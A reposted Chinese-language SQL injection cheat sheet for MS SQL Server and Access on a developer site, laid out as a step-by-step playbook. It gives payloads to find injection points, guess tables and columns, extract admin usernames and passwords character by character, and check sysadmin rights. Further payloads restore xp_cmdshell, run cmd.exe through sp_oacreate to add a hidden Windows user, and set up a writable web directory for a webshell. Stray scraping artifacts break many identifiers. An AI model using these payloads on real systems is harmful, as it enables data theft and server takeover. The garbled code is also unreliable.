首页    技术博客    PHP教程    数据库技术    前端开发   HTML5    Nginx    php论坛
新用户注册 | 会员登录
加入会员,解锁专属内容
取消
热门标签 | HotTags
当前位置:  开发笔记 > 编程语言 > 正文

转sql注入

作者:命运2502901041_350 | 来源:互联网 | 2023-07-28 13:53
1.判断有无注入点  ; and 1=1 and 1=2 2.猜表一般的表的名称无非是admin adminuser user pass password 等

1.判断有无注入点 


; and 1=1 and 1=2



2.猜表一般的表的名称无非是admin adminuser user pass password 等.. 


and 0<>(select count(*) from *) 


and 0<>(select count(*) from admin) ---判断是否存在admin这张表

3.猜帐号数目 如果遇到0<返回正确页面 1<返回错误页面说明帐号数目就是1个 


and 0<(select count(*) from admin) 


and 1<(select count(*) from admin)

4.猜解字段名称 在len( ) 括号里面加上我们想到的字段名称. 


and 1=(select count(*) from admin where len(*)>0)-- 


and 1=(select count(*) from admin where len(用户字段名称name)>0) 


and 1=(select count(*) from admin where len(_blank>密码字段名称password)>0)

5.猜解各个字段的长度 猜解长度就是把>0变换 直到返回正确页面为止 


and 1=(select count(*) from admin where len(*)>0) 


and 1=(select count(*) from admin where len(name)>6) 错误 


and 1=(select count(*) from admin where len(name)>5) 正确 长度是6 


and 1=(select count(*) from admin where len(name)=6) 正确

and 1=(select count(*) from admin where len(password)>11) 正确 


and 1=(select count(*) from admin where len(password)>12) 错误 长度是12 


and 1=(select count(*) from admin where len(password)=12) 正确

6.猜解字符 


and 1=(select count(*) from admin where left(name,1)=a) ---猜解用户帐号的第一位 


and 1=(select count(*) from admin where left(name,2)=ab)---猜解用户帐号的第二位 


就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了 


and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) -- 


这个查询语句可以猜解中文的用户和_blank>密码.只要把后面的数字换成中文的ASSIC码就OK.最后把结果再转换成字符.

group by users.id having 1=1-- 


group by users.id, users.username, users.password, users.privs having 1=1-- 


; insert into users values( 666, attacker, foobar, 0xffff )--

UNION SELECT TOP 1 COLUMN_blank>_NAME FROM INFORMATION_blank>_SCHEMA.COLUMNS

WHERE TABLE_blank>_NAME=logintable- 


UNION SELECT TOP 1 COLUMN_blank>_NAME FROM INFORMATION_blank>_SCHEMA.COLUMNS

WHERE TABLE_blank>_NAME=logintable WHERE COLUMN_blank>_NAME NOT IN (login_blank

>_id)- 


UNION SELECT TOP 1 COLUMN_blank>_NAME FROM INFORMATION_blank>_SCHEMA.COLUMNS

WHERE TABLE_blank>_NAME=logintable WHERE COLUMN_blank>_NAME NOT IN (login_blank

>_id,login_blank>_name)- 


UNION SELECT TOP 1 login_blank>_name FROM logintable- 


UNION SELECT TOP 1 password FROM logintable where login_blank>_name=Rahul--

看_blank>服务器打的补丁=出错了打了SP4补丁 


and 1=(select @@VERSION)--

看_blank>数据库连接账号的权限,返回正常,证明是_blank>服务器角色sysadmin权限。 


and 1=(SELECT IS_blank>_SRVROLEMEMBER(sysadmin))--

判断连接_blank>数据库帐号。(采用SA账号连接 返回正常=证明了连接账号是SA) 


and sa=(SELECT System_blank>_user)-- 


and user_blank>_name()=dbo-- 


and 0<>(select user_blank>_name()--

看xp_blank>_cmdshell是否删除 


and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = X AND name = xp_

blank>_cmdshell)--

xp_blank>_cmdshell被删除,恢复,支持绝对路径的恢复 


;EXEC master.dbo.sp_blank>_addextendedproc xp_blank>_cmdshell,xplog70.dll-- 


;EXEC master.dbo.sp_blank>_addextendedproc xp_blank>_cmdshell,c:\inetpub\wwwroot\

xplog70.dll--

反向PING自己实验 


;use master;declare @s int;exec sp_blank>_oacreate "wscript.shell",@s out;exec sp_blank>

_oamethod @s,"run",NULL,"cmd.exe /c ping 192.168.0.1";--

加帐号 


;DECLARE @shell INT EXEC SP_blank>_OACREATE wscript.shell,@shell OUTPUT EXEC SP_blank>

_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net user jiaoniang$Content$nbsp;1866574 /add--

创建一个虚拟目录E盘: 


;declare @o int exec sp_blank>_oacreate wscript.shell, @o out exec sp_blank>_oamethod @o,

run, NULL, cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w "默认Web站点" -v "e","e:\"--

访问属性:(配合写入一个webshell) 


declare @o int exec sp_blank>_oacreate wscript.shell, @o out exec sp_blank>_oamethod @o,

run, NULL, cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse

 



爆库 特殊_blank>技巧::%5c=\ 或者

 

您正在看的SQLserver教程是:sql注入语句。把/和\ 修改%5提交 


and 0<>(select top 1 paths from newtable)--

得到库名(从1到5都是系统的id,6以上才可以判断) 


and 1=(select name from master.dbo.sysdatabases where dbid=7)-- 


and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6) 


依次提交 dbid = 7,8,9.... 得到更多的_blank>数据库名

and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U) 暴到一个表 假设为 admin 


and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U and name not in (Admin))

来得到其他的表。 


and 0<>(select count(*) from bbs.dbo.sysobjects where xtype=U and name=admin 


and uid>(str(id))) 暴到UID的数值假设为18779569 uid=id 


and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569) 得到一个admin的一个

字段,假设为 user_blank>_id 


and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569 and name not in 


(id,...)) 来暴出其他的字段 


and 0<(select user_blank>_id from BBS.dbo.admin where username>1) 可以得到用户名 


依次可以得到_blank>密码。。。。。假设存在user_blank>_id username ,password 等字段

and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6) 


and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U) 得到表名 


and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U and name not in(Address)) 


and 0<>(select count(*) from bbs.dbo.sysobjects where xtype=U and name=admin and uid>(s

tr(id))) 判断id值 


and 0<>(select top 1 name from BBS.dbo.syscolumns where id=773577794) 所有字段

?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin 


?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin (union,access也好用)




转 sql注入




推荐阅读
  • dll

    如何在Windows环境下配置php+apache环境

    本文介绍了在Windows环境下如何配置php+apache环境,包括下载php7和apache2.4、安装vc2015运行时环境、启动php7和apache2.4等步骤。希望对需要搭建php7环境的读者有一定的参考价值。摘要长度为169字。 ... [详细]
  • dll

    Go Cobra命令行工具入门教程

    Go Cobra命令行工具入门教程
    本文介绍了Go语言实现的命令行工具Cobra的基本概念、安装方法和入门实践。Cobra被广泛应用于各种项目中,如Kubernetes、Hugo和Github CLI等。通过使用Cobra,我们可以快速创建命令行工具,适用于写测试脚本和各种服务的Admin CLI。文章还通过一个简单的demo演示了Cobra的使用方法。 ... [详细]
  • list

    如何查询zone下的表的信息

    如何查询zone下的表的信息
    本文介绍了如何通过TcaplusDB知识库查询zone下的表的信息。包括请求地址、GET请求参数说明、返回参数说明等内容。通过curl方法发起请求,并提供了请求示例。 ... [详细]
  • function

    绕过WAF的XSS检测机制及构建XSS payload的方法

    本文介绍了绕过WAF的XSS检测机制的方法,包括确定payload结构、测试和混淆。同时提出了一种构建XSS payload的方法,该payload与安全机制使用的正则表达式不匹配。通过清理用户输入、转义输出、使用文档对象模型(DOM)接收器和源、实施适当的跨域资源共享(CORS)策略和其他安全策略,可以有效阻止XSS漏洞。但是,WAF或自定义过滤器仍然被广泛使用来增加安全性。本文的方法可以绕过这种安全机制,构建与正则表达式不匹配的XSS payload。 ... [详细]
  • select

    MySQL语句大全:创建、授权、查询、修改等【MySQL】的使用方法详解

    MySQL语句大全:创建、授权、查询、修改等【MySQL】的使用方法详解
    本文详细介绍了MySQL语句的使用方法,包括创建用户、授权、查询、修改等操作。通过连接MySQL数据库,可以使用命令创建用户,并指定该用户在哪个主机上可以登录。同时,还可以设置用户的登录密码。通过本文,您可以全面了解MySQL语句的使用方法。 ... [详细]
  • select

    揭秘阿里云WAF背后神秘的AI智能防御体系

    背景应用安全领域,各类攻击长久以来都危害着互联网上的应用,在web应用安全风险中,各类注入、跨站等攻击仍然占据着较前的位置。WAF(Web应用防火墙)正是为防御和阻断这类攻击而存在 ... [详细]
  • select

    如何在Azure应用服务实例上获取.NetCore 3.0+的支持?

    本文介绍了如何在Azure应用服务实例上获取.NetCore 3.0+的支持。作者分享了自己在将代码升级为使用.NET Core 3.0时遇到的问题,并提供了解决方法。文章还介绍了在部署过程中使用Kudu构建的方法,并指出了可能出现的错误。此外,还介绍了开发者应用服务计划和免费产品应用服务计划在不同地区的运行情况。最后,文章指出了当前的.NET SDK不支持目标为.NET Core 3.0的问题,并提供了解决方案。 ... [详细]
  • select

    Python脚本编写创建输出数据库并添加模型和场数据的方法

    Python脚本编写创建输出数据库并添加模型和场数据的方法
    本文介绍了使用Python脚本编写创建输出数据库并添加模型数据和场数据的方法。首先导入相应模块,然后创建输出数据库并添加材料属性、截面、部件实例、分析步和帧、节点和单元等对象。接着向输出数据库中添加场数据和历程数据,本例中只添加了节点位移。最后保存数据库文件并关闭文件。文章还提供了部分代码和Abaqus操作步骤。另外,作者还建立了关于Abaqus的学习交流群,欢迎加入并提问。 ... [详细]
  • select

    Android 新闻App的本地服务器搭建教程

    本文介绍了在开发Android新闻App时,搭建本地服务器的步骤。通过使用XAMPP软件,可以一键式搭建起开发环境,包括Apache、MySQL、PHP、PERL。在本地服务器上新建数据库和表,并设置相应的属性。最后,给出了创建new表的SQL语句。这个教程适合初学者参考。 ... [详细]
  • filter

    Java工具类库Hutool介绍及功能概述

    本文介绍了Java工具类库Hutool,该工具包封装了对文件、流、加密解密、转码、正则、线程、XML等JDK方法的封装,并提供了各种Util工具类。同时,还介绍了Hutool的组件,包括动态代理、布隆过滤、缓存、定时任务等功能。该工具包可以简化Java代码,提高开发效率。 ... [详细]
  • dll

    在虚拟服务器上安装oracle 10g客户端的问题及解决方法

    本文讨论了在VMWARE5.1的虚拟服务器Windows Server 2008R2上安装oracle 10g客户端时出现的问题,并提供了解决方法。错误日志显示了异常访问违例,通过分析日志中的问题帧,找到了解决问题的线索。文章详细介绍了解决方法,帮助读者顺利安装oracle 10g客户端。 ... [详细]
  • dll

    Wince程序内存和存储内存的分析及作用

    本文分析了Wince程序内存和存储内存的分布及作用。Wince内存包括系统内存、对象存储和程序内存,其中系统内存占用了一部分SDRAM,而剩下的30M为程序内存和存储内存。对象存储是嵌入式wince操作系统中的一个新概念,常用于消费电子设备中。此外,文章还介绍了主电源和后备电池在操作系统中的作用。 ... [详细]
  • dll

    OCI连接MySQL_PLSQL Developer连接远程数据库OCI客户端安装方法

    OCI连接MySQL_PLSQL Developer连接远程数据库OCI客户端安装方法
    本文介绍了使用OCI客户端连接MySQL和PLSQL Developer连接远程数据库的安装方法,避免了在本地安装Oracle数据库或类似的开发套件的麻烦,同时解决了PLSQL Dev连接远程Oracle时的配置问题。 ... [详细]
  • dll

    深入解析Linux下的I/O多路转接epoll技术

    深入解析Linux下的I/O多路转接epoll技术
    本文深入解析了Linux下的I/O多路转接epoll技术,介绍了select和poll函数的问题,以及epoll函数的设计和优点。同时讲解了epoll函数的使用方法,包括epoll_create和epoll_ctl两个系统调用。 ... [详细]
  • dll

    oracle11g 过程,oracle11g 安装过程

    安装oracle软件1创建用户组、用户和目录bjdb节点下:[rootnode1]#groupadd-g200oinstall[rootnode1]#groupad ... [详细]
author-avatar
命运2502901041_350
这个家伙很懒,什么也没留下!
Tags | 热门标签
RankList | 热门文章
PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有